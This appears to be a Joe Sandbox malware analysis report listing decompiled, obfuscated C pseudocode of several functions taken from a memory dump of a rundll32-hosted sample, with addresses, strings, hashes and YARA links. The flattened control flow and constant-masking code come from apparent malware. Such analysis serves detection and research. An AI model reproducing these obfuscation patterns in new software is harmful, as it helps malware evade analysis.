				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E007A8F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E007A19B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E007B1E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}

0x007aeaa0
0x007aeaa4
0x007aeaa6
0x007aeaaa
0x007aeaae
0x007aeab2
0x007aeab3
0x007aeab4
0x007aeab9
0x007aeac1
0x007aeacb
0x007aeacd
0x007aead4
0x007aead5
0x007aead9
0x007aeae1
0x007aeae9
0x007aeaf1
0x007aeaf9
0x007aeb01
0x007aeb09
0x007aeb11
0x007aeb19
0x007aeb21
0x007aeb29
0x007aeb37
0x007aeb3b
0x007aeb43
0x007aeb4b
0x007aeb53
0x007aeb5b
0x007aeb63
0x007aeb67
0x007aeb6f
0x007aeb77
0x007aeb7f
0x007aeb84
0x007aeb89
0x007aeb91
0x007aeb99
0x007aeba1
0x007aeba9
0x007aebb1
0x007aebb9
0x007aebc1
0x007aebc9
0x007aebd1
0x007aebd9
0x007aebe6
0x007aebea
0x007aebf2
0x007aebff
0x007aec03
0x007aec0b
0x007aec13
0x007aec1b
0x007aec20
0x007aec28
0x007aec30
0x007aec38
0x007aec40
0x007aec48
0x007aec50
0x007aec58
0x007aec60
0x007aec68
0x007aec75
0x007aec79
0x007aec81
0x007aec92
0x007aec98
0x007aeca2
0x007aeca6
0x007aecaa
0x007aecb2
0x007aecb2
0x007aecc0
0x007aed52
0x007aed57
0x007aed59
0x007aed5f
0x007aed61
0x00000000
0x007aed61
0x007aecc2
0x007aecc8
0x007aed16
0x007aed1b
0x007aed1e
0x007aed20
0x00000000
0x007aecca
0x007aecd0
0x00000000
0x007aecd6
0x007aece7
0x007aecec
0x007aecd0
0x007aecc8
0x007aecef
0x007aecf8
0x007aecf8
0x007aed6b
0x007aed6d
0x007aed6d
0x00000000

Strings

-5/, xrefs: 007AED6D
JF, xrefs: 007AEC30
WzSq, xrefs: 007AEB09
^VF, xrefs: 007AEC81

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -5/$WzSq$^VF$JF
API String ID: 0-2399144359
Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
Instruction ID: 139c462fdeac46d8d93718f77eb5f1af64be9f06a6fa223036bafcf895219926
Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
Instruction Fuzzy Hash: B77131710083419BC758CF65C98A81BBBF2FBC9758F504A1DF296A6220D3B5DA48DF83

Uniqueness

Uniqueness Score: -1.00%

Function 007B9BCF Relevance: 5.1, Strings: 4, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E007B9BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E007AB6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E007A9B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E007A52C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E007A2051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}

0x007b9bcf
0x007b9bd9
0x007b9be3
0x007b9be8
0x007b9bed
0x007b9bf5
0x007b9bfd
0x007b9c05
0x007b9c0d
0x007b9c12
0x007b9c17
0x007b9c1f
0x007b9c27
0x007b9c2f
0x007b9c37
0x007b9c3f
0x007b9c47
0x007b9c4f
0x007b9c57
0x007b9c5f
0x007b9c67
0x007b9c6f
0x007b9c77
0x007b9c7f
0x007b9c84
0x007b9c8c
0x007b9c94
0x007b9ca1
0x007b9ca5
0x007b9ca7
0x007b9caf
0x007b9cbd
0x007b9cc0
0x007b9cc4
0x007b9cc8
0x007b9cd0
0x007b9cd5
0x007b9cdd
0x007b9ce5
0x007b9cf2
0x007b9cf6
0x007b9cfa
0x007b9cfe
0x007b9d06
0x007b9d0e
0x007b9d13
0x007b9d1b
0x007b9d23
0x007b9d2b
0x007b9d33
0x007b9d3b
0x007b9d3b
0x007b9d4d
0x007b9e02
0x00000000
0x007b9d53
0x007b9d59
0x007b9df6
0x007b9df8
0x00000000
0x007b9d5f
0x007b9d65
0x007b9dc1
0x007b9dc9
0x007b9dce
0x007b9dd1
0x007b9dd3
0x007b9dd5
0x00000000
0x007b9dd5
0x007b9d67
0x007b9d6d
0x007b9da0
0x007b9da5
0x007b9da7
0x007b9da9
0x007b9daf
0x00000000
0x007b9daf
0x007b9d6f
0x007b9d75
0x00000000
0x007b9d7b
0x007b9d8f
0x007b9d91
0x00000000
0x007b9d91
0x007b9d75
0x007b9d6d
0x007b9d65
0x007b9d59
0x00000000
0x007b9d4d
0x007b9e0c
0x007b9e16
0x007b9e1f
0x007b9e27
0x007b9e33
0x007b9e35
0x007b9e38
0x007b9e3d
0x007b9e3d
0x007b9e3d
0x007b9e4a
0x007b9e55

Strings

`/&, xrefs: 007B9C3F
m9, xrefs: 007B9CE5
<~), xrefs: 007B9BD9
cA, xrefs: 007B9DC1

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <~)$`/&$cA$m9
API String ID: 0-2671356241
Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
Instruction ID: e5e1abb501bf93294ee94f3a4f0adb22c23600fe0a54c52aada53404d3ef69ce
Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
Instruction Fuzzy Hash: 7D51647110C3019FC398CE21D49946BBBE1FFD8758F501E1EF6A696260C778CA098F92

Uniqueness

Uniqueness Score: -1.00%

Function 007A9B83 Relevance: 5.1, Strings: 4, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E007A9B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E007B20B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E007A91DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E007A76AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E007B1E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}

0x007a9b8b
0x007a9b93
0x007a9b96
0x007a9b99
0x007a9b9c
0x007a9b9f
0x007a9ba0
0x007a9ba1
0x007a9ba6
0x007a9bb4
0x007a9bb5
0x007a9bb9
0x007a9bba
0x007a9bbb
0x007a9bc2
0x007a9bc9
0x007a9bd0
0x007a9bda
0x007a9bdf
0x007a9be4
0x007a9beb
0x007a9bf2
0x007a9bf9
0x007a9bfd
0x007a9c04
0x007a9c08
0x007a9c0f
0x007a9c16
0x007a9c1a
0x007a9c21
0x007a9c28
0x007a9c32
0x007a9c38
0x007a9c3b
0x007a9c42
0x007a9c49
0x007a9c52
0x007a9c55
0x007a9c5c
0x007a9c63
0x007a9c6a
0x007a9c71
0x007a9c75
0x007a9c7c
0x007a9c83
0x007a9c8a
0x007a9c91
0x007a9c98
0x007a9c9f
0x007a9ca6
0x007a9cad
0x007a9cb4
0x007a9cbb
0x007a9cc2
0x007a9cc9
0x007a9cd4
0x007a9cd7
0x007a9cdb
0x007a9ceb
0x007a9cf3
0x007a9cf7
0x007a9d16
0x007a9d21
0x007a9d26
0x007a9d30

Strings

av, xrefs: 007A9BC9
d)4, xrefs: 007A9BA6
Du, xrefs: 007A9BD0
sZ|, xrefs: 007A9C21

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Du$av$d)4$sZ|
API String ID: 0-269012183
Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
Instruction ID: 7b7b0d13249b2d3d580d6f7923a81cd7e2af4f19a679e9cdb6525af85fd9d699
Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
Instruction Fuzzy Hash: 715112B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108158E412B6260D3755A59DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32 ref: 10043743
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
GetACP.KERNEL32 ref: 1004377E

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9

Uniqueness

Uniqueness Score: -1.00%

Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B0E53 Relevance: 4.1, Strings: 3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007B0E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E007BDA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E007AB6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E007A8969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E007A47CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E007BDCF7(_v2692, 0x7a1308, _t480),  &_v1560, _v2616, _v2636);
							E007AA8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E007AEA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E007B46BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E007A47CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E007BDCF7(_v2640, 0x7a13b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E007AA8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E007AAB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}

0x007b0e53
0x007b0e59
0x007b0e63
0x007b0e68
0x007b0e70
0x007b0e78
0x007b0e80
0x007b0e89
0x007b0e90
0x007b0e92
0x007b0e9d
0x007b0ea2
0x007b0ead
0x007b0eb8
0x007b0ec3
0x007b0ecb
0x007b0ed3
0x007b0edb
0x007b0ee3
0x007b0eeb
0x007b0ef3
0x007b0ef8
0x007b0f00
0x007b0f08
0x007b0f10
0x007b0f18
0x007b0f20
0x007b0f28
0x007b0f30
0x007b0f38
0x007b0f43
0x007b0f4e
0x007b0f59
0x007b0f61
0x007b0f69
